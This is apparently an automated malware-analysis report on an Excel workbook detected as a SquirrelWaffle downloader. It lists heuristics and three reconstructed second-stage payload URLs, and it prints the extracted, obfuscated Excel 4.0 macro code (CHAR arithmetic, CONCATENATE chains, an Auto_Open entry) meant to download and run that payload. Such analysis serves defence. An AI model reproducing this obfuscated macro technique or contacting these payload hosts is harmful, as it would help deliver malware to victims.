MALICIOUS
302
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The file contains Excel 4.0 macros, specifically an Auto_Open defined name that utilizes dangerous functions like ShellExecute and constructs URLs from cell arrays. These macros are designed to download and execute a second-stage payload from one of the three embedded URLs, as indicated by the ClamAV detection and heuristic firings. The reconstructed URL is "https://generatorulubabanu.ro/gD4xRuhIPb/sot.html".
Heuristics 7
-
ClamAV: Xls.Downloader.SquirrelWaffle20921-9895790-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Downloader.SquirrelWaffle20921-9895790-0
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FNExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
-
URL reconstructed from XLM cell array (3 URLs) critical OLE_XLM_CELL_ARRAY_URLExcel 4.0 macro sheet stages its payload URL across the BIFF8 Shared String Table (one quoted-char SST entry concatenated with & at runtime), across individual numeric cells (one ASCII charcode per cell), or split across multi-char fragment cells a download formula concatenates by reference (=A1&A2&… / CONCATENATE(...)). The reconstructed URL is invisible to literal-bytes URL extraction because it is never contiguous in the workbook stream. URLs were recovered by walking the BIFF8 record stream and decoding SST entries, LABELSST/RK/NUMBER cells, and FORMULA cell-reference concatenation in token order.
-
Reference to ShellExecute API high SC_STR_SHELLEXECReference to ShellExecute API
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://generatorulubabanu.ro/gD4xRuhIPb/sot.html Referenced by macro
- https://ottawaprocessservers.ca/Cct1pa3E/sot.htmlReferenced by macro
- https://totallybaked.ca/QrCCMgkEM7p/sot.htmlReferenced by macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 9672 bytes |
SHA-256: 1f55e9f0a91d0734a14528f6f311ff204196878cc1cea0f1bf639ccf94bbeb61 |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 13 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Shee
' 0085 10 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden - G
' 0085 11 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden - ra
' 0085 11 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden - kn
' 0085 15 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden - gerhrs
' 0085 12 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden - gfh
' 0085 13 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden - e3ef
' 0085 13 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden - esrg
' 0085 12 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden - rye
' 0085 13 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden - fhdr
' 0085 13 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden - thdh
' 0085 12 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden - thr
' 0085 12 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden - ecf
' 0085 11 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden - rg
' 0085 12 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden - efg
' 0085 12 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden - reg
' 0085 13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden - fdsf
' 0085 12 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden - efe
' 0085 14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden - gfege
' 0018 29 LABEL : Cell Value, String Constant - _xlfn.ARABIC hidden len=2 ptgErr *INCOMPLETE FORMULA PARSING* Remaining, unparsed expression: b'\x1d'
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d rg!H1
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
' ra,D1,CHAR(200-86),""
' ra,G2,CHAR(109-61),""
' ra,K2,CHAR(190-91),""
' ra,O2,CHAR(150-68),""
' ra,C3,CHAR(200-99),""
' ra,M3,CHAR(184-99),""
' ra,H4,CHAR(200-133),""
' ra,N4,CHAR(179-103),""
' ra,B5,CHAR(200-125),""
' ra,E5,CHAR(101-50),""
' ra,J5,CHAR(250-134),""
' ra,P5,CHAR(230-130),""
' ra,F7,CHAR(100-50),""
' ra,I7,CHAR(210-113),""
' ra,L7,CHAR(220-109),""
' ra,Q7,CHAR(157-88),""
' ra,N8,CHAR(180-61),""
' ra,A9,CHAR(201-91),""
' ra,C9,CHAR(210-102),""
' ra,H10,CHAR(140-72),""
' ra,J10,CHAR(230-109),""
' ra,P10,CHAR(186-102),""
' ra,D11,CHAR(140-91),""
' ra,L11,CHAR(192-100),""
' ra,E12,CHAR(190-75),""
' ra,I12,CHAR(220-115),""
' ra,Q12,CHAR(190-70),""
' ra,S12,CHAR(207-104),""
' ra,B13,CHAR(101-36),""
' ra,O13,CHAR(160-90),""
' ra,K14,CHAR(145-99),""
' ra,D15,CHAR(145-71),""
' ra,G15,CHAR(210-93),""
' ra,P15,CHAR(190-86),""
' ra,T15,CHAR(197-85),""
' ra,L16,CHAR(150-84),""
' ra,E17,CHAR(230-172),""
' ra,I17,CHAR(205-96),""
' ra,Q17,CHAR(240-122),""
' ra,N18,CHAR(150-67),""
' ra,B19,CHAR(220-108),""
' ra,J21,CHAR(108-55),""
' ra,H32,_xlfn.ARABIC("CXI"),""
' ra,D35,_xlfn.ARABIC("CI"),""
' ra,K46,_xlfn.ARABIC("LXV"),""
' kn,I2,"CONCATENATE( Shee!S24, Shee!N18, Shee!P15, Shee!C3, Shee!C9, Shee!C9, Shee!E5, Shee!F7, Shee!S24, Shee!S25)",""
' kn,Q4,"CONCATENATE( Shee!S24, Shee!L7, Shee!T15, Shee!C3, Shee!A9, Shee!S24, Shee!S25)",""
' kn,D5,"CONCATENATE( Shee!S24, Shee!H4, Shee!D1, Shee!C3, Shee!I7, Shee!J5, Shee!C3,, Shee!H10, Shee!I12, Shee!D1, Shee!C3, Shee!K2, Shee!J5, Shee!L7, Shee!D1, Shee!J10, Shee!B13, Shee!S24, Shee!S25)",""
' kn,L7,"CONCATENATE( Shee!S24, Shee!N18, Shee!P15, Shee!C3, Shee!C9, Shee!C9, Shee!Q7, Shee!Q12, Shee!C3, Shee!K2, Shee!G15, Shee!J5, Shee!C3, Shee!B13, Shee!S24, Shee!S25)",""
' kn,S7,"CONCATENATE( Shee!S24, Shee!D1, Shee!C3, Shee!S12, Shee!E12, Shee!Q17, Shee!D1, Shee!E5, Shee!F7, Shee!S24, Shee!S25)",""
' kn,H9,"CONCATENATE( Shee!S24, Shee!M3, Shee!O2,)",""
' kn,F10,"CONCATENATE( Shee!S24, Shee!D15, Shee!H4, Shee!D15, Shee!S24, Shee!S25)",""
' kn,O11,"CONCATENATE( Shee!S24, Shee!D15, Shee!D15, Shee!H4, Shee!H4, Shee!H4, Shee!D15, Shee!D15, Shee!S24, Shee!S25)",""
' kn,B13,"CONCATENATE( Shee!S24, Shee!B5, Shee!C3, Shee!D1, Shee!A9, Shee!C3, Shee!C9, Shee!E5, Shee!F7, Shee!S24, Shee!S25)",""
' kn,H14,"CONCATENATE( Shee!S24, Shee!D15, Shee!D15, Shee!H4, Shee!H4, Shee!L16, Shee!L16, Shee!S24, Shee!S25)",""
' kn,F15,"CONCATENATE( Shee!S24, Shee!G15, Shee!D1, Shee!C9, Shee!I17, Shee!L7, Shee!A9, Shee!S24, Shee!S25)",""
' kn,D17,"CONCATENATE( Shee!S24, Shee!H4, Shee!E17, Shee!L11, Shee!H10, Shee!I7, Shee!J5, Shee!L7, Shee!B19, Shee!S24, Shee!S25)",""
' kn,B21,"CONCATENATE( Shee!S24, Shee!H4, Shee!E17, Shee!L11, Shee!H10, Shee!I7, Shee!J5, Shee!L7, Shee!B19, Shee!L11, Shee!J5, Shee!C3, Shee!E12, Shee!J5, Shee!D11, Shee!K14, Shee!J5, Shee!C3, Shee!E12, Shee!J5, Shee!S24, Shee!S25)",""
' kn,G24,"CONCATENATE( Shee!S24, Shee!H4, Shee!E17, Shee!L11, Shee!H10, Shee!I7, Shee!J5, Shee!L7, Shee!B19, Shee!L11, Shee!J5, Shee!C3, Shee!E12, Shee!J5, Shee!K14, Shee!J5, Shee!C3, Shee!E12, Shee!J5, Shee!S24, Shee!S25)",""
' kn,E28,"CONCATENATE( Shee!S24, Shee!H4, Shee!E17, Shee!L11, Shee!H10, Shee!I7, Shee!J5, Shee!L7, Shee!B19, Shee!L11, Shee!J5, Shee!C3, Shee!E12, Shee!J5, Shee!F7, Shee!K14, Shee!J5, Shee!C3, Shee!E12, Shee!J5, Shee!S24, Shee!S25)",""
' gerhrs,I10,"CONCATENATE( Shee!N4, Shee!H10,)",""
' gfh,I11,"CONCATENATE( Shee!L7, Shee!N8,)",""
' e3ef,H12,"CONCATENATE( Shee!A9, Shee!C9,)",""
' esrg,J8,"CONCATENATE( Shee!L7, Shee!I7,)",""
' rye,I11,"CONCATENATE( Shee!P5, Shee!P10,)",""
' fhdr,N8,"CONCATENATE(, Shee!O13, Shee!I12, Shee!C9, Shee!S46)",""
' thdh,I12,"CONCATENATE( Shee!B13, Shee!S24, Shee!S25)",""
' thr,F9,"CONCATENATE( Shee!G2, Shee!S25)",""
' ecf,H8,"FORMULA( G!B13, ra!H21)=FORMULA( G!D5, ra!H22)=FORMULA( thr!D4, kn!E22)=FORMULA( G!F10, ra!H23)=FORMULA( ecf!G14, thdh!I9)=FORMULA( G!D17, ra!H24)=FORMULA( G!H9& gerhrs!I10& gfh!I11& e3ef!H12& esrg!J8& rye!I11& thdh!I9& fhdr!N8& kn!E22& reg!I12, ra!H27)=FORMULA( Shee!G2, ra!H25)=FORMULA( G!F15, ra!H26)=FORMULA( efg!F9, ra!H29)=FORMULA( G!H14, ra!H28)=FORMULA( G!G24, ra!H31)=FORMULA( G!I2, ra!H34)=FORMULA( G!L7, ra!H35)=FORMULA( fdsf!D19, efe!C18)=FORMULA( G!O11, ra!H36)=FORMULA( G!Q4, ra!H38)=FORMULA( G!B21, ra!H58)=FORMULA( G!S7, ra!H39)=FORMULA( G!G24, ra!H40)=FORMULA( G!E28, ra!H60)=FORMULA( Shee!J21, ra!H42)=FORMULA( Shee!P31& Shee!P33& efe!C18& Shee!P35& Shee!P35& Shee!P36& ra!H21& ra!H22& ra!H23& ra!H24& ra!H25& Shee!P37, rg!H20)=FORMULA( Shee!P31& Shee!P33& efe!C18& Shee!P35& Shee!P35& Shee!P36& ra!H34& ra!H35& ra!H36& ra!H29& ra!H38& ra!H39& ra!H40& ra!H29& ra!H42& Shee!P37, rg!H24)=FORMULA( Shee!P31& Shee!P33& efe!C18& Shee!P35& Shee!P35& Shee!P36& ra!H26& ra!H27& ra!H28& ra!H29& G!I18& ra!H31& ra!H29& ra!H25& Shee!P37, rg!H22)=FORMULA( Shee!P31& Shee!P33& efe!C18& Shee!P35& Shee!P35& Shee!P36& ra!H26& ra!H27& ra!H28& ra!H29& G!I19& ra!H58& ra!H29& ra!H25& Shee!P37, rg!H26)=FORMULA( Shee!P31& Shee!P33& efe!C18& Shee!P35& Shee!P35& Shee!P36& ra!H34& ra!H35& ra!H36& ra!H29& ra!H38& ra!H39& ra!H58& ra!H29& ra!H42& Shee!P37, rg!H28)=FORMULA( Shee!P31& Shee!P33& efe!C18& Shee!P35& Shee!P35& Shee!P36& ra!H26& ra!H27& ra!H28& ra!H29& G!I20& ra!H60& ra!H29& ra!H25& Shee!P37, rg!H30)=FORMULA( Shee!P31& Shee!P33& efe!C18& Shee!P35& Shee!P35& Shee!P36& ra!H34& ra!H35& ra!H36& ra!H29& ra!H38& ra!H39& ra!H60& ra!H29& ra!H42& Shee!P37, rg!H32)",""
' efg,D11,"FORMULA(CHAR(200-99), thdh!I9)",""
' reg,G14,CHAR( Shee!H32),""
' fdsf,D4,CHAR( Shee!D35),""
' gfege,D19,CHAR( Shee!K46),""
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.